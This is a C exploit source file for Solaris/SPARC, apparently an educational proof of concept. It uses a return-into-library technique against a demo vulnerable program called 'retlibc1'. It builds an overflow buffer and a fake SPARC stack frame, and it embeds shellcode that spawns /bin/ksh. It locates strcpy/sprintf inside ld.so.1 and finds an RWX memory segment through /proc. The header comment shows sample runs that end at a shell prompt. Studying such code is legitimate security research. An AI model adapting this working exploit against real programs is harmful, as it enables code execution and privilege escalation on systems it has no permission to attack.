/*
 * $Id: retlibc1-ex4.c,v 1.5 2007/01/09 16:03:13 raptor Exp $
 *
 * retlibc1-ex4.c - retlibc1.c exploit (Solaris/SPARC retlibc)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Another ret-into-library exploit for Solaris/SPARC systems. We return into
 * strcpy() or sprintf() inside the dynamic linker (/usr/lib/ld.so.1), using 
 * dlmopen(). This way, we don't have to link the exploit with the same 
 * libraries as the target program. Please note that this technique is not 
 * going to work with all functions (see ld.so.1 symbols), so be careful if for 
 * some reason you don't wanna get stuck with strcpy() and sprintf().
 *
 * Thanks to Inode <inode@deadlocks.info> for his interesting research and
 * to KF <dotslash@globalintersec.com> for giving me access to his Solaris
 * 10 box.
 *
 * Compile with: "gcc retlibc1-ex4.c -o retlibc1-ex4 -ldl".
 *
 * bash-2.05b$ uname -a
 * SunOS ims0 5.10 s10_63 sun4u sparc SUNW,Ultra-4
 * bash-2.05b$ gcc --version
 * gcc (GCC) 3.3.2
 * bash-2.05b$ ./retlibc1-ex4
 * Using SI_PLATFORM       : SUNW,Ultra-4 (5.10)
 * Using stack base        : 0xffbffffc
 * Using ff address        : 0xffbfff6c
 * Using rwx_mem address   : 0xff3ec004
 * Using sc address        : 0xffbfffb0
 * Using function address  : 0xff3c1bc4
 * $ 
 *
 * bash-2.05$ uname -a 
 * SunOS morgana 5.9 Generic sun4u sparc SUNW,Ultra-5_10
 * bash-2.05$ gcc --version
 * gcc (GCC) 3.2
 * bash-2.05$ ./retlibc1-ex4
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.9)
 * Using stack base        : 0xffbffffc
 * Using ff address        : 0xffbfff64
 * Using rwx_mem address   : 0xff3f6004
 * Using sc address        : 0xffbfffa8
 * Using function address  : 0xff3e0288
 * $ 
 *
 * bash-2.05$ uname -a
 * SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
 * bash-2.05$ gcc --version
 * gcc (GCC) 3.3.2
 * bash-2.05$ ./retlibc1-ex4 
 * Using SI_PLATFORM       : SUNW,Ultra-5_10 (5.8)
 * Using stack base        : 0xffbefffc
 * Using ff address        : 0xffbeff64
 * Using rwx_mem address   : 0xff3e2004
 * Using sc address        : 0xffbeffa8
 * Using function address  : 0xff3ce7e8
 * $ 
 */

#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULN 	"./retlibc1"	// the vulnerable program
#define BUF	336 + 1		// size of the evil buffer
#define FF	64 + 1		// size of the fake frame
#define DUMMY	0xdeadbeef	// dummy memory address

/* voodoo macros */
#define	VOODOO32(_,__,___)	{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define	VOODOO64(_,__,___)	{_+=7-(_+(__+___+1)*4+3)%8;}

char sc[] = /* Solaris/SPARC shellcode (48 bytes) */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* (ugly) global variables */
char	*arg[256];
int	arg_pos = 0, arg_len = 0;
char	*env[256];
int	env_pos = 0, env_len = 0;

/* 
 * add_arg(): add an argument to argv 
 */
int add_arg(char * string)
{
	/* null termination */
	if (!string) {
		arg[arg_pos] = NULL;
		return(arg_len);
	}

	/* take care of argv[0] padding */
	if (!arg_pos) {
		arg[arg_pos] = "AAA";
		arg_len += 4;
		arg_pos++;
	}

	/* actually add the argument to argv */
	arg[arg_pos] = string;
	arg_len += strlen(string) + 1;
	arg_pos++;

	return(arg_len);	
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char * string)
{
	int 	i;

	/* null termination */
	if (!string) {
		env[env_pos] = NULL;
		return(env_len);
	}

	/* add the variable to envp */
	env[env_pos] = string;
	env_len += strlen(string) + 1;	
	env_pos++;

	/* pad the envp using zeroes */
	if ((strlen(string) + 1) % 4)
		for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
			env[env_pos] = string + strlen(string);
			env_len++;
		}
	
	return(env_len);
}

/*
 * pad_arg(): pad argv using argv[0] and get a padded envp[0] too
 */
void pad_arg(void)
{
	int 	pad;
	char 	*arg0;

	/* already padded? */
	if (!(arg_len % 4))
		return;

	/* malloc() the right amount of space for padding */
	pad = 4 - (arg_len % 4);
	arg0 = (char *)malloc(pad + strlen(arg[0]) + 1);

	/* write the padding and terminate argv[0] */
	memset(arg0, 'A', (pad + strlen(arg[0]) + 1));
	arg0[(pad + strlen(arg[0]) + 1) - 1] = 0x0;

	/* use the new argv[0] */
	arg_len = arg_len - (strlen(arg[0]) + 1) + strlen(arg0) + 1;
	arg[0] = arg0;

	return;
}

/*
 * search_ldso(): search for a symbol inside ld.so.1
 */
int search_ldso(char *sym)
{
	int 		addr;
	void		*handle;	
	Link_map	*lm;

	/* open the executable object file */
	if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
		perror("dlopen");
		exit(1);
	}

	/* get dynamic load information */
	if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
		perror("dlinfo");
		exit(1);
	}

	/* search for the address of the symbol */
	if ((addr = (int)dlsym(handle, sym)) == NULL) {
		fprintf(stderr, "sorry, function %s() not found\n", sym);
		exit(1);
	}

	/* close the executable object file */
	dlclose(handle);

	/* check the address for the presence of a 0x0 */
	if (!((addr - 4) & 0xff) || !((addr - 4) & 0xff00) || 
	    !((addr - 4) & 0xff0000) || !((addr - 4) & 0xff000000)) {
		fprintf(stderr, "the address of %s() contains a 0x0!\n", sym);
		exit(1);
	}

	return(addr);
}

/*
 * search_rwx_mem(): search for an RWX memory segment valid for all 
 * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
 */
int search_rwx_mem(void)
{
	int 	fd, pid = getpid();
	char	tmp[16];
	prmap_t	map;
	int	addr = 0;

	/* open the proc filesystem */
	sprintf(tmp,"/proc/%d/map", pid);
	if ((fd = open(tmp, O_RDONLY)) < 0) {
		fprintf(stderr, "can't open %s\n", tmp);
		exit(1);
	}

	/* search for the last RWX memory segment before stack */
	while (read(fd, &map, sizeof(map)))
		if (map.pr_mflags == (MA_READ | MA_WRITE | MA_EXEC))
			addr = map.pr_vaddr;
	close(fd);	

	/* add 4 to the exact address NULL bytes */
	if (!(addr & 0xff))
		addr |= 0x04;
	if (!(addr & 0xff00))
		addr |= 0x0400;

	return(addr);
}

/*
 * main()
 */
int main(int argc, char **argv)
{
	char 	buf[BUF];
	char	ff[FF];
	char 	platform[256], release[256];

	int	*p;
	int 	ff_addr, shell_addr, offset, rel;
	int	plat_len, prog_len;
	int	ret, rwx_mem;

	/* get the stack base */
	int 	sb = ((int)argv[0] | 0xffff) & 0xfffffffc;

	/* get some system informations */
	sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
	sysinfo(SI_RELEASE, release, sizeof(release) - 1);
	rel = atoi(release + 2);

	/* get the address of strcpy() or sprintf() in libc */
	ret = (rel < 10 ? search_ldso("strcpy") : search_ldso("sprintf"));

	/* get the address of /usr/lib/ld.so.1 RWX memory segment */
	rwx_mem = search_rwx_mem();

	/* fill the evil buffer */
	memset(buf, 'A', sizeof(buf));
	buf[sizeof(buf) - 1] = 0x0;

	/* add the arguments, pad argv and envp[0] */
	add_arg(buf);
	add_arg(NULL);
	pad_arg();

	/* initialize the fake frame */
	bzero(ff, sizeof(ff));

	/* 
	 * saved %l registers
	 */
	p = (int *)(ff);
	*p++ = DUMMY;		/* %l0 */
	*p++ = DUMMY;		/* %l1 */
	*p++ = DUMMY;		/* %l2 */
	*p++ = DUMMY;		/* %l3 */
	*p++ = DUMMY;		/* %l4 */
	*p++ = DUMMY;		/* %l5 */
	*p++ = DUMMY;		/* %l6 */
	*p++ = DUMMY;		/* %l7 */

	/* 
	 * saved %i registers
	 */
	*p++ = rwx_mem;		/* %i0: first arg to strcpy() */
	*p++ = 0x42424242;	/* %i1: second arg to strcpy() */
	*p++ = DUMMY;		/* %i2 */
	*p++ = DUMMY;		/* %i3 */
	*p++ = DUMMY;		/* %i4 */
	*p++ = DUMMY;		/* %i5 */
	*p++ = sb - 1000;	/* %i6: frame pointer */
	*p++ = rwx_mem - 8;	/* %i7: return address */

	/* put fake frame and shellcode in envp, keeping padding */
	shell_addr = add_env(ff);
	add_env(sc);
	add_env(NULL);

	/* calculate the offset to argv[0] (voodoo magic) */
	plat_len = strlen(platform) + 1;
	prog_len = strlen(strrchr(VULN, '/') + 1) + 1;
	offset = arg_len + env_len + plat_len + prog_len;
	if (rel > 7)
		VOODOO64(offset, arg_pos, env_pos)
	else
		VOODOO32(offset, plat_len, prog_len)

	/* calculate the fake frame address (envp[0]) and shell address */
	ff_addr = sb - offset + arg_len;
	shell_addr += ff_addr;

	/* set %i1 */
	p = (int *)(ff + 36);
	*p++ = shell_addr;	/* %i1: second arg to strcpy() */

	/* set main()'s %i6 and %i7 */
	p = (int *)(buf + 328);
	*p++ = ff_addr;		/* fake frame address */
	*p++ = ret - 4;		/* return address in ld.so.1 (must skip save) */

	/* print some output */
	fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
	fprintf(stderr, "Using stack base\t: 0x%p\n", sb);
	fprintf(stderr, "Using ff address\t: 0x%p\n", ff_addr);
	fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", rwx_mem);
	fprintf(stderr, "Using sc address\t: 0x%p\n", shell_addr);
	fprintf(stderr, "Using function address\t: 0x%p\n", ret);

	/* run the vulnerable program */
	execve(VULN, arg, env);
	perror("execve");
}
